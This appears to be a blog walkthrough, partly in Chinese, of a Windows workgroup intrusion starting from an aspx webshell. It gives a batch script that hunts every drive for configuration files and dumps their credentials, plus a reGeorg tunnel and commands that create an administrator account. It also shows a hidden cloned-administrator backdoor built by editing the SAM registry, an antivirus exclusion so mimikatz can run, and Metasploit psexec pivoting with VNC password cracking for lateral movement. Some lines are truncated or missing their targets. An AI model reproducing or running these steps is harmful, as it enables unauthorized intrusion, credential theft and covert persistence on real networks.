Inside network in workgroup

on under web
2 minute read

0x01 Base

got a webshell of aspx)  
don't know how to get system shell from this webshell  
there exists not only one site on  
find has another address

0x02 Steps

1>search web.config on all sites to find sa and sapass

@echo off
goto :main
这是注释:(for /f "delims="的作用为取消默认的以空格等符号作为分割符
dir /s 实现了linux中的find功能,for /r path %%i in (web.conf?g) do ... 也可以实现find功能,但是自己实现时发现for /r path ...中的path只能是一个具
set str=c d e f g h i j k l m n o p q r s t u v w x y z 
echo  当前硬盘的分区有: 
for %%i in (%str%) do (
if exist %%i: (echo %%i:
for /f "delims=" %%j in ('dir /b /s %%i:\web.conf?g %%i:\global.a?a %%i:\wp-config.p?p %%i:\setting.p?p %%i:\database.p?p %%i:\config.p?p %%i:
\config.ini.p?p %%i:\conn.p?p %%i:\connect.p?p %%i:\conn.a?p %%i:\conn.a?a') do (
echo *****filepath***** >> tmp.txt
echo %%j >> tmp.txt
type "%%j" >> tmp.txt
echo. >> tmp.txt
echo ---------------------------- >> tmp.txt
echo 我是美丽的分割线 >> tmp.txt
echo ---------------------------- >> tmp.txt
echo. >> tmp.txt

Set ws = CreateObject("Wscript.Shell") "cmd /c 1.bat",vbhide

cscript 2.vbs
or download from:

[+] find sa and sapass of,but as a inside network pc,3389 is not allowed from outside

2>upload a tunnel.aspx(from reGeorg) to

[python] -p 1080 -u

3>use sa pri in chopper execute:

net user tmp /add & net localgroup administrators tmp /add  
net localgroup "remote desktop users" tmp /add

4>runas admin->cmd-> mstsc /console /v: -admin

[ with tmp account]:  
add a superhide administrator account cloned from administrator account:  
net user tmp$ /add & net localgroup administrators tmp$ /add
regedit->local machine->sam->account->name
export 0x111<assume as administrator's> as admin.reg
export 0x222<assume as tmp$'s> as user.reg
export account->name->tmp$ as tmp.reg
copy /F value from admin.reg to user.reg
net user tmp$ /del
import tmp.reg and user.reg
delete admin.reg,user.reg,tmp.reg

[ with tmp$ account]:  
net user tmp /del
open setup of eset to add exclude file path
copy \\tsclient\mimikatz\ exclude_folder

[run mimikatz]:  

5>upload a meterpreter payload to

meterpreter>run get_local_subnets
(handler)>route add 1
(handler)>route print
(handler)>use auxiliary/scanner/portscan/tcp
set ports 25,110,21,80,8080,443,1433,3606,3389,5900
set rhosts
set threads 24

(handler)use exploit/windows/smb/psexec
(handler)set rhosts
(handler)set username and pass from sekurlsa::logonpasswords in mimikatz before
or the password find by mimikatz in msf:
load  mimikatz
mimikatz_command -f sekurlsa::searchPasswords
enter other pc by smbpass
use mimikatz to find morepassword
search regedit to find morevncpassword

search winvnc password in
if ini file with password was delete,then open regedit search "password" 
find vnc password
use vnccrack tool in cain to carck it
get vncpassword
use auxiliary/scanner/vnc/vnc_login
set rhosts
set password vpnpassword
enter other pc by vnc password
use mimikatz to find morepassword
search regedit to find morevncpassword

use morepassword in exploit/windows/smb/psexec
use morevncpassword in auxiliary/scanner/vnc/vnc_login

inside network, windows, aspx, 工作组